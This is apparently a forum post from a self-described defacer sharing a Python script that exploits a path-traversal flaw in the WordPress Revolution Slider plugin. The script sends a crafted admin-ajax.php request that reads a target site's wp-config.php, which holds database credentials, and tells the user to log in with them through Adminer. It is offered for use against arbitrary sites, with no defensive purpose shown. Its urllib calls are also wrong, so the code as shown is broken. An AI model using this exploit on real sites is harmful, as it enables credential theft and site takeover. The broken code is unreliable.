WordPress Revslider Exploit Grab Config

#360
Topic created · 1 Posts · 12 Views
  • #################################
    # Exploit Title: 
    # Author: Xale [ Turkish Defacer ]
    # Date: 27.09.2021
    # Greetz: BetLex & Qualwin & Deus Lorenzo & GaskmanTR & 0X4-Team
    # Tested On: Kali Linux
    # Risk: Medium - High
    ##################################
    
    Coded With Python 
    revslider.py
    
    import os
    import urllib.request
    
    os.system("sudo apt-get install figlet")
    os.system("clear")
    os.system("figlet XALE")
    print(" ")
    print("Revslider Exploit | Grab Config | Coded By Xale")
    print(" ")
    targets = input("Target WordPress Site: (Sample: example.com) ")
    
    target = targets + "/wp-admin/admin-ajax.php?action=revslider\_show\_image&img=../wp-config.php"
    
    htm = urllib.request.open(target)
    print("Grabbed Config: (Connect: Adminer)")
    print(" ")
    print(htm.open())
    
    GitHub: https://github.com/xaletr/RevSlider-Exploit
    
Log in to reply